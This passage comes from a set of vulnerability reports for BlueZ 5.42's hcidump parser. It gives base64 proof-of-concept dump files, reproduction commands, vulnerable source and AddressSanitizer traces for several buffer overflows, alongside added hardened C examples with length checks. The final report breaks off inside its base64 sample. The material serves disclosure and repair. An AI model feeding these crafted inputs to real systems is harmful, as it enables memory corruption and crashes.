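The reassembly code above sizes the buffer from dlen (the length field in the L2CAP header) but copies frm->len bytes (the length of the ACL fragment as read from the file), and the two are never compared. The block below is an added example, not code from the report or from BlueZ, of the same reassembly step with the two lengths reconciled: the fragment must be long enough to contain a header before dlen is read from it, and it must not exceed the buffer the header implies. The `frame` and `reasm` structs are hypothetical stand-ins for hcidump's own, frm->len is kept signed because it is signed in the parser, and the sample fragments are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* L2CAP basic header: 16-bit PDU length then 16-bit CID, little-endian. */
#define L2CAP_HDR_SIZE 4

/* Hypothetical stand-ins for hcidump's frame and per-handle reassembly state. */
struct frame { const uint8_t *ptr; int len; };
struct reasm { uint8_t *data; size_t data_len; size_t len; };

/* Start reassembling an L2CAP PDU from its first ACL fragment. Returns 0 on
 * success, -1 if the fragment cannot hold a header or carries more bytes
 * than the header's length field announces. */
int l2cap_start_reassembly(struct reasm *fr, const struct frame *frm)
{
    /* l2cap_dump copies frm->len bytes as-is; the ASan report's copy size of
     * 4294967295 is what a negative length becomes once cast to size_t. */
    if (frm->len < L2CAP_HDR_SIZE)
        return -1;

    uint16_t dlen = (uint16_t)(frm->ptr[0] | (frm->ptr[1] << 8));
    size_t need = (size_t)dlen + L2CAP_HDR_SIZE;

    /* The buffer is sized from the header, so the fragment must fit in it. */
    if ((size_t)frm->len > need)
        return -1;

    uint8_t *buf = malloc(need);
    if (!buf)
        return -1;
    memcpy(buf, frm->ptr, (size_t)frm->len);

    free(fr->data);
    fr->data = buf;
    fr->data_len = need;
    fr->len = (size_t)frm->len;
    return 0;
}

/* Append a continuation fragment; the same bound applies to the running total. */
int l2cap_continue_reassembly(struct reasm *fr, const struct frame *frm)
{
    if (!fr->data || frm->len < 0 || (size_t)frm->len > fr->data_len - fr->len)
        return -1;
    memcpy(fr->data + fr->len, frm->ptr, (size_t)frm->len);
    fr->len += (size_t)frm->len;
    return 0;
}

int l2cap_reassembly_complete(const struct reasm *fr)
{
    return fr->data != NULL && fr->len == fr->data_len;
}

int main(void)
{
    /* Constructed: header announces 3 payload bytes on CID 0x0040; the first
     * fragment carries 2 of them and a second fragment brings the last one. */
    static const uint8_t first[] = { 0x03, 0x00, 0x40, 0x00, 0xaa, 0xbb };
    static const uint8_t rest[]  = { 0xcc };
    struct frame f1 = { first, sizeof first }, f2 = { rest, sizeof rest };
    struct reasm fr = { NULL, 0, 0 };

    printf("start: %d\n", l2cap_start_reassembly(&fr, &f1));
    printf("continue: %d\n", l2cap_continue_reassembly(&fr, &f2));
    printf("complete: %d\n", l2cap_reassembly_complete(&fr));
    free(fr.data);
    return 0;
}
```

The same "is the struct actually inside the frame" check is what the ba2str report above needs in extended_inq_result_dump: a length test on frm->len before the event struct is dereferenced, rather than a fix in ba2str itself.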
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
An out-of-bounds read was observed in the "le_meta_ev_dump" function in the "tools/parser/hci.c" source file. The issue exists because 'subevent', taken directly from the event and used as an index into the 'ev_le_meta_str' array, is never checked against the array bounds; the 8-byte read in the ASan report is the char pointer fetched from past the end of the table, which printf("%s") then dereferences. The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAQ/xjyQAToA4AEBAxbAJD//0kDAKSQIAAgAQb/yyIAgAAB/3+Pf0siSgABABI+Pj5YGj662AME
BwASPgBkPBo+ugADBAEAMD4+PkkAAR8AA+YBAD4IBBo+ABC62AMEAQAwPllVWAABHwAD5gEAPgAE
Gj5APv//AwQBAAU+Pj1YJz668AMEAQASPj4+WBo+utgDBAEA/38A6RcaProAAwQBABIkPj5YGj66
2BAEAQA7//+6AIMEAQASJD4fWAABAQA+HwQaPkA=

Affected code:
3659 static inline void le_meta_ev_dump(int level, struct frame *frm)
3660 {
3661     evt_le_meta_event *mevt = frm->ptr;
3662     uint8_t subevent;
3663
3664     subevent = mevt->subevent;
3665
3666     frm->ptr += EVT_LE_META_EVENT_SIZE;
3667     frm->len -= EVT_LE_META_EVENT_SIZE;
3668
3669     p_indent(level, frm);
3670     printf("%s\n", ev_le_meta_str[subevent]);
3671
3672     switch (mevt->subevent) {
3673     case EVT_LE_CONN_COMPLETE:
3674         evt_le_conn_complete_dump(level + 1, frm);
3675         break;
3676     case EVT_LE_ADVERTISING_REPORT:
3677         evt_le_advertising_report_dump(level + 1, frm);
3678         break;
3679     case EVT_LE_CONN_UPDATE_COMPLETE:
3680         evt_le_conn_update_complete_dump(level + 1, frm);
3681         break;
3682     case EVT_LE_READ_REMOTE_USED_FEATURES_COMPLETE:
3683         evt_le_read_remote_used_features_complete_dump(level + 1, frm);
3684         break;
3685     default:
3686         raw_dump(level, frm);
3687         break;
3688     }
3689 }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==30076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005bd780 at pc 0x48701d bp 0x7d1fca13a5c0 sp 0x7d1fca13a5b8
READ of size 8 at 0x0000005bd780 thread T0
    #0 0x48701c in le_meta_ev_dump tools/parser/hci.c:3670
    #1 0x48701c in event_dump tools/parser/hci.c:3991
    #2 0x48701c in hci_dump tools/parser/hci.c:4116
    #3 0x4035d4 in parse tools/parser/parser.h:260
    #4 0x4035d4 in read_dump tools/hcidump.c:425
    #5 0x4035d4 in main tools/hcidump.c:810
    #6 0x7bf781766b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x0000005bd780 is located 15 bytes to the right of global variable '*.LC615' from 'tools/parser/hci.c' (0x5bd760) of size 17
  '*.LC615' is ascii string 'Inquiry Complete'
0x0000005bd780 is located 32 bytes to the left of global variable '*.LC616' from 'tools/parser/hci.c' (0x5bd7a0) of size 15
  '*.LC616' is ascii string 'Inquiry Result'
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/hci.c:3670 le_meta_ev_dump
Shadow bytes around the buggy address:
  0x0000800afaa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
  0x0000800afab0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 06 f9
  0x0000800afac0: f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9 00 00 00 00
  0x0000800afad0: 06 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
  0x0000800afae0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 01 f9
=>0x0000800afaf0:[f9]f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 01 f9
  0x0000800afb00: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 01 f9
  0x0000800afb10: f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9 00 00 00 01
  0x0000800afb20: f9 f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800afb30: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
  0x0000800afb40: 00 00 00 06 f9 f9 f9 f9 00 00 03 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==30076==ABORTING
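le_meta_ev_dump above indexes a fixed string table with a byte read straight from the event, and the subevent handlers it dispatches to then parse further length-prefixed records from the same frame. The block below is an added example, not code from the report or from BlueZ, of the two checks that pattern needs: the table index is bounded (and NULL slots are tolerated) before the lookup, and the advertising-report body is walked with every length field tested against the bytes that remain. The string table is a constructed subset of the real names, the advertising-report layout follows the HCI specification (num_reports, then per report event_type, address_type, bdaddr, data_length, data, rssi), and the `frame` struct and sample event are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct frame { const uint8_t *ptr; size_t len; };

/* Constructed subset of the LE meta subevent names, indexed by subevent code
 * (0x01 connection complete, 0x02 advertising report, ...). There is no
 * subevent code 0, so slot 0 is NULL and must be tolerated by the lookup. */
static const char *const le_meta_str[] = {
    NULL,
    "LE Connection Complete",
    "LE Advertising Report",
    "LE Connection Update Complete",
    "LE Read Remote Used Features Complete",
    "LE Long Term Key Request",
};
#define LE_META_STR_NUM (sizeof(le_meta_str) / sizeof(le_meta_str[0]))

/* le_meta_ev_dump does ev_le_meta_str[subevent] with no bound on the
 * attacker-controlled byte; this checks both the index and the entry. */
const char *le_meta_name(uint8_t subevent)
{
    if (subevent >= LE_META_STR_NUM || le_meta_str[subevent] == NULL)
        return "Unknown";
    return le_meta_str[subevent];
}

/* Count the reports in an LE Advertising Report body (the bytes after the
 * subevent code): num_reports, then per report event_type(1), addr_type(1),
 * bdaddr(6), data_len(1), data(data_len), rssi(1). Returns the count, or -1
 * if any record runs past the end of the buffer. */
int le_adv_report_count(const uint8_t *p, size_t len)
{
    if (len < 1)
        return -1;
    uint8_t num = p[0];
    size_t off = 1;
    for (uint8_t i = 0; i < num; i++) {
        if (len - off < 9)                       /* event_type .. data_len */
            return -1;
        uint8_t data_len = p[off + 8];
        off += 9;
        if (len - off < (size_t)data_len + 1)    /* data + rssi */
            return -1;
        off += (size_t)data_len + 1;
    }
    return num;
}

/* Dispatch on the subevent like le_meta_ev_dump, but only after verifying
 * that the one-byte meta-event header is present. Returns the subevent code,
 * or -1 when the frame is truncated; *reports receives the report count. */
int le_meta_ev_parse(const struct frame *frm, int *reports)
{
    *reports = 0;
    if (frm->len < 1)
        return -1;
    uint8_t subevent = frm->ptr[0];
    if (subevent == 0x02) {
        *reports = le_adv_report_count(frm->ptr + 1, frm->len - 1);
        if (*reports < 0)
            return -1;
    }
    return subevent;
}

int main(void)
{
    /* Constructed: advertising report with one entry carrying 2 data bytes. */
    static const uint8_t adv[] = { 0x02, 0x01,
        0x00, 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x02, 0xaa, 0xbb, 0xc8 };
    struct frame f = { adv, sizeof adv };
    int n;
    int sub = le_meta_ev_parse(&f, &n);

    printf("%s: %d report(s)\n", le_meta_name((uint8_t)sub), n);
    printf("subevent 0xff -> %s\n", le_meta_name(0xff));
    return 0;
}
```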
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A stack buffer overflow was observed in the "pin_code_reply_dump" function in the "tools/parser/hci.c" source file. The issue exists because cp->pin_len bytes are copied from the "pin_code_reply_cp *cp" command into the 17-byte "pin" array without checking pin_len against the size of the array (the ASan report shows a 209-byte write, which runs through the neighbouring 'addr' and 'tm' objects on the stack). The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IABAl5CgBAQEBAQoBA0EAJCQkEMC0dHOleIAAABkAAEGhwIX/39vllIgSmQBAAAAgD5sGv9mAAAB
AQASRD4+WCE7AAAABAEAED4+PlgAAR8ADuYBAD4IBBo+/T660AMEAQAwPj4+WAABHwAD5gEAPgAE
Fj4BAP//AwQBAAVRPj1YBj666AMEAQASPj4+WBo+utgDBAEA/5wAAAPmAQAAAwQBABIkAAABAD66
2AMEAQD/fwAAGBo+AAAAAQEAEiQ+PlgAAbrYAwQBAH8+PlA8Gjq6AAMEAQAwJj4+WAABHwAD5gEA
PgAEGjgaEAAESgABAAD5gD5sGv9mBgDmAQA+CAQaPho+utADBAEAMD4+PlgAAR8AA+YBADA+Pj5Y
AAEfAAPmAQA+lxYaPho+utgDBAEAMD5HPloAAR8AA+YBAD4ABBo+Gj662BIEAQCMPj5NWBo+ugAD
BAEAAJCPjwBAj5TTgAABABI+TT5YGv+AAPYEAQASPj4BAAAAugADBAEAED4+PlgAAR8ADuYBAD4I
BBo+Gj662AMEAQAwPj4+WAABHwAD5gEAPgAEFj5APv//AwQBAAU+Pj1YBj7c6AMEAQASPj4+WBo+
utgDBAEA/5wAABgaZLoAAwQBABIkPj5YGj662AMEAQD/fwAAGBo+AAAAAQEAMyQ+PlgAAbrYA4QB
ABI+Pj08Gjq6AAMEAQAwPj4+WPsAHwADAAEAPgAEGjgaPrr4AwQBAGQA//9/cn9EBEoAAQASPj4+
WBo+utgDBAEAEj4+PTw6ProAAwQBADA+Pj5YAD662AMEAQASPj49PDo+ugADBAEAMD4+PlgAAR8A
A+YBAD6XFho+Gj662AMEAQAwPkc+WgABHwAD5gEAPgAEGj4aPrrYEgQBAIw+Pk1YGj66AAMEAQAA
kI+PAECPlNOAAAEAEj5NPlga/4AA9gQBABI+PgEAAAC6AAMEAQAQPj4+WAABHwAO5gEAPggEGj4a
PrrYAwQBADA+Pj5YAAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwQBABI+Pj5YGj662AME
AQD/nAAAGBo+ugADBAEAEiQ+PlgaPrrYAwQBAP9/AAAYGj4AAAABABI+Pj49PDo+ugADBAEA

Affected code:
981 static inline void pin_code_reply_dump(int level, struct frame *frm)
982 {
983     pin_code_reply_cp *cp = frm->ptr;
984     char addr[18], pin[17];
985
986     p_indent(level, frm);
987     p_ba2str(&cp->bdaddr, addr);
988     memset(pin, 0, sizeof(pin));
989     if (parser.flags & DUMP_NOVENDOR)
990         memset(pin, '*', cp->pin_len);
991     else
992         memcpy(pin, cp->pin_code, cp->pin_len);
993     printf("bdaddr %s len %d pin \'%s\'\n", addr, cp->pin_len, pin);
994 }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==24887==ERROR: AddressSanitizer: unknown-crash on address 0x7aea85364520 at pc 0x4787ca bp 0x7aea85364450 sp 0x7aea85364448
WRITE of size 209 at 0x7aea85364520 thread T0
    #0 0x4787c9 in pin_code_reply_dump tools/parser/hci.c:992
    #1 0x4787c9 in command_dump tools/parser/hci.c:1752
    #2 0x479623 in hci_dump tools/parser/hci.c:4112
    #3 0x4035d4 in parse tools/parser/parser.h:260
    #4 0x4035d4 in read_dump tools/hcidump.c:425
    #5 0x4035d4 in main tools/hcidump.c:810
    #6 0x6f5f04015b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

Address 0x7aea85364520 is located in stack of thread T0 at offset 160 in frame
    #0 0x46b3cf in command_dump tools/parser/hci.c:1685

  This frame has 6 object(s):
    [32, 38) 'b'
    [96, 104) 't'
    [160, 177) 'pin' <== Memory access at offset 160 partially overflows this variable
    [224, 242) 'addr' <== Memory access at offset 160 partially underflows this variable
    [288, 344) 'tm' <== Memory access at offset 160 partially underflows this variable
    [384, 633) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/hci.c:992 pin_code_reply_dump
Shadow bytes around the buggy address:
  0x0f5dd0a64850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a64860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a64870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a64880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a64890: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
=>0x0f5dd0a648a0: f2 f2 f2 f2[00]00 01 f4 f2 f2 f2 f2 00 00 02 f4
  0x0f5dd0a648b0: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2
  0x0f5dd0a648c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a648d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
  0x0f5dd0a648e0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f5dd0a648f0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==24887==ABORTING
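The commands_dump report (csr.c) and the pin_code_reply_dump report above are the same defect in two places: a fixed-size stack array is filled with memcpy using a length taken from the packet (frm->len in one case, cp->pin_len in the other). The block below is an added example, not code from the reports or from BlueZ, of hardened counterparts of both functions. It assumes the pin_code_reply_cp layout of a 6-byte bdaddr, a pin_len byte and a 16-byte pin_code field, mirrors that layout in a hypothetical `pin_code_reply` struct, uses a hypothetical `frame` struct with an unsigned length, and feeds both functions constructed sample frames; `novendor` stands in for the DUMP_NOVENDOR flag.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct frame { const uint8_t *ptr; size_t len; };

/* Hardened counterpart of commands_dump: the 64-byte array is only filled
 * when the frame fits, and the formatted output is bounded as well. Returns
 * the number of characters written to `out`, or -1 if the frame is too large. */
int dump_commands_checked(char *out, size_t outsz, const struct frame *frm)
{
    unsigned char commands[64];
    size_t pos = 0;

    if (frm->len > sizeof(commands))   /* commands_dump memcpy'd frm->len unconditionally */
        return -1;
    memcpy(commands, frm->ptr, frm->len);

    for (size_t i = 0; i < frm->len; i++) {
        int n = snprintf(out + pos, outsz - pos, " 0x%02x", commands[i]);
        if (n < 0 || (size_t)n >= outsz - pos)
            return -1;
        pos += (size_t)n;
    }
    return (int)pos;
}

/* Hypothetical mirror of pin_code_reply_cp: bdaddr, pin_len, then the 16-byte
 * pin_code field. A PIN is at most 16 bytes, so any pin_len above 16 is bogus. */
struct pin_code_reply { uint8_t bdaddr[6]; uint8_t pin_len; uint8_t pin_code[16]; };

/* Hardened counterpart of pin_code_reply_dump: pin[17] receives at most 16
 * bytes plus the terminator, and the frame must actually hold the whole
 * command before it is read. Returns pin_len on success, -1 otherwise. */
int format_pin_checked(char *pin, size_t pinsz, const struct frame *frm, int novendor)
{
    struct pin_code_reply cp;

    if (pinsz < sizeof(cp.pin_code) + 1 || frm->len < sizeof cp)
        return -1;
    memcpy(&cp, frm->ptr, sizeof cp);          /* copy out instead of casting frm->ptr */
    if (cp.pin_len > sizeof(cp.pin_code))      /* the original trusted this byte */
        return -1;

    memset(pin, 0, pinsz);
    if (novendor)
        memset(pin, '*', cp.pin_len);
    else
        memcpy(pin, cp.pin_code, cp.pin_len);
    return cp.pin_len;
}

int main(void)
{
    char line[512], pin[17];
    /* Constructed: 3 supported-command bytes, and a PIN reply with pin_len 4. */
    static const uint8_t cmds[] = { 0xff, 0x03, 0x80 };
    static uint8_t reply[23] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x04, '1', '2', '3', '4' };
    struct frame f1 = { cmds, sizeof cmds }, f2 = { reply, sizeof reply };

    if (dump_commands_checked(line, sizeof line, &f1) > 0)
        printf("commands%s\n", line);
    if (format_pin_checked(pin, sizeof pin, &f2, 0) >= 0)
        printf("pin '%s'\n", pin);
    reply[6] = 209;                            /* the pin_len ASan saw in the PoC */
    printf("pin_len 209 -> %d\n", format_pin_checked(pin, sizeof pin, &f2, 0));
    return 0;
}
```

Copying the command out of the frame with memcpy, rather than casting frm->ptr to a struct pointer, also means the frame-length check happens before any field is touched, which is the check the extended-inquiry and LE meta event reports above are missing as well.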
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
An out-of-bounds read was observed in the "print_cont_state" function in the "tools/parser/sdp.c" source file. The function prints cont + 1 bytes, where cont is the continuation-state length byte taken from the packet, without checking how many bytes actually remain in the buffer; the ASan report shows the read one byte past the end of the 54-byte L2CAP reassembly buffer. The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAABP8EDP///n//AgICFwIXAAEAAj4AAAEAAAC1tY8ABP//////jikAmM0gAPf/GRAAf40VAIoC
AgITAjIAAAAFPgAAAQABAAACAAD/AOsaAP+OKZKYzSAACQAaqQCQjQAAnwICQhMCFwAAAAU+AAAB
AQAAq7WPAAT///b//44pAJjNIAAEAQASPj4+WBo+utgDBAEA/5wAABgaProAAwC1tXQABP//////
jikAmM0gAPf/GRAAf40VAIoCAgITAjIAAAAFPgAAAQABAIAAAAD/AOsaAP+OKZKYzSAA9/8ZqQCQ
jQAAnwICQhMCFwAAAAU+AAABAQAAq7WPAAT///b//44pAJjNIAAEAT6jAAM+PlgaPj49PBo+ugAb
BAEAMD4+WBo+utgDBAEAEj4+PTwaProAAwQBADA+Pj5YAAEf

Affected code:
568 static inline void print_cont_state(int level, unsigned char *buf)
569 {
570     uint8_t cont = buf[0];
571     int i;
572
573     p_indent(level, 0);
574     printf("cont");
575     for (i = 0; i < cont + 1; i++)
576         printf(" %2.2X", buf[i]);
577     printf("\n");
578 }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==6337==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef96 at pc 0x4e39ec bp 0x7f3553ec2550 sp 0x7f3553ec2548
READ of size 1 at 0x60600000ef96 thread T0
    #0 0x4e39eb in print_cont_state tools/parser/sdp.c:576
    #1 0x4e39eb in sdp_dump tools/parser/sdp.c:764
    #2 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
    #3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
    #4 0x479c9c in acl_dump tools/parser/hci.c:4041
    #5 0x479c9c in hci_dump tools/parser/hci.c:4120
    #6 0x4035d4 in parse tools/parser/parser.h:260
    #7 0x4035d4 in read_dump tools/hcidump.c:425
    #8 0x4035d4 in main tools/hcidump.c:810
    #9 0x7da2df158b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x60600000ef96 is located 0 bytes to the right of 54-byte region [0x60600000ef60,0x60600000ef96)
allocated by thread T0 here:
    #0 0x7da2df53673f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
    #2 0x1f

SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:576 print_cont_state
Shadow bytes around the buggy address:
  0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c0c7fff9df0: 00 00[06]fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==6337==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A buffer overflow was observed in the "read_n" function in the "tools/hcidump.c" source file. This issue can be triggered by processing a corrupted dump file and will result in an hcidump crash. To replicate this issue, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAQ/xkAQAQEBIAEBCBiAJB9kNAC0bv/YOIgAQb/y0QAgAAB/3+Pf2UiSgABABI+PgAAABC62AME
AQD/nAAAGBo+ugADBAEAEiQ+PlgaPrrYAwQBAP9/AAAYGj4AAAABAQAzVD4+WAAButgDhAEAEj4+
PTwaOroAAwQBADA+Pj5YAAEfAAMAAQA+AAQaOBo+uvgDBAEAZAD//wByf0QESgABABI+Pj5YGj66
2AMEAQASPj49PDo+ugADBAEAMD4+PlgAAR8AA+YBAD6XFho+Gj662AMEAT4+WBo7AAAABAEAEj4+
PlgAAh8ADuYBAD4IBBo+Gj660AMEAQAwPj4+WAABHwAD5gEAPgAEFj4BAP//AwQBAAU+Pj1YBhG6
6AMEAQASPj4+WBo+utgDBAEA/5wAABgaProA4QMBABIkPj5YGj662AMEAQD/fwAAIBo+AAAAAQEA
MyQ+PljYAbrYA4QBABI+Pj08Gjq6AAMEAQAwPj4+WAABH3//AAEAPgAEGjgAAACAAwQBAGQA//8A
cn9EBEoAAQASPj4+WBo+utgDBAEAEj4+EDw6ProAAwQBAACAPj5YAAEfAAPmAQA+lxYaPho+utgD
BAEAMD5HPloAAR8AA+YBAD4ABBo+GgD/2BIEAQCMPj5NWBo+ugADBAEAAJCPjwBAj5TTgAABABI+
TT5YGv+AAPYEAQASPj4BAAAAugADBAEAED4+vRAAAR8ADuYBAD4IBBo+OrrYAwQBABI+Pj08Oj66
AAMEAQAwPj4+WAABHwAD5gEAPpcWGj4aPrrYAwQBADA+Rz5aAAEfAAPmAQA+AAQaPhr/ZgcAAQEA
8D4+PlgaOwAAAAQBABI+Pj5YAAIfAA7mAQA+CAQaPho+utADBAEAMD4+PlgAAR8AA+YBAD4AQAA+
AQD//wMEAQAFfj49WAY+uugDBAEAEj4+PlgaPrrYAwQBAP+cAAAYGj66AAMEAQASJD4+WBo+utgD
BAEA/38AIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiPBo6ugADBAEAMD4+PlgAAR8AAwABAD4A
BBo4Gj66+AMEAQBkAP//AHJ/RARKAAEA/38AABgaPgAAAAEBADMkPj5YAAG6twOXAQASAAQaPhr/
ZgcAAQEA8D4+PmQaOwAAAAQBABI+Pj5YAAIfAA7mAQA+CAQaPho+utADBAEAMD4+PlgAAR8AA+YB
AD4ABBY+AQD//wMEAQAFPj49WAY+uugDBAEAEj4+PlgaPrrYAwQBAP+cAAAYGj66AAMEAQASJD4+
WBo+utgDBAEA/38AACAaPgAAAAEBADMkAT5YAAG62AOEAQASPj49PBo6ugAC6QEAMD4+PlgAAR8A
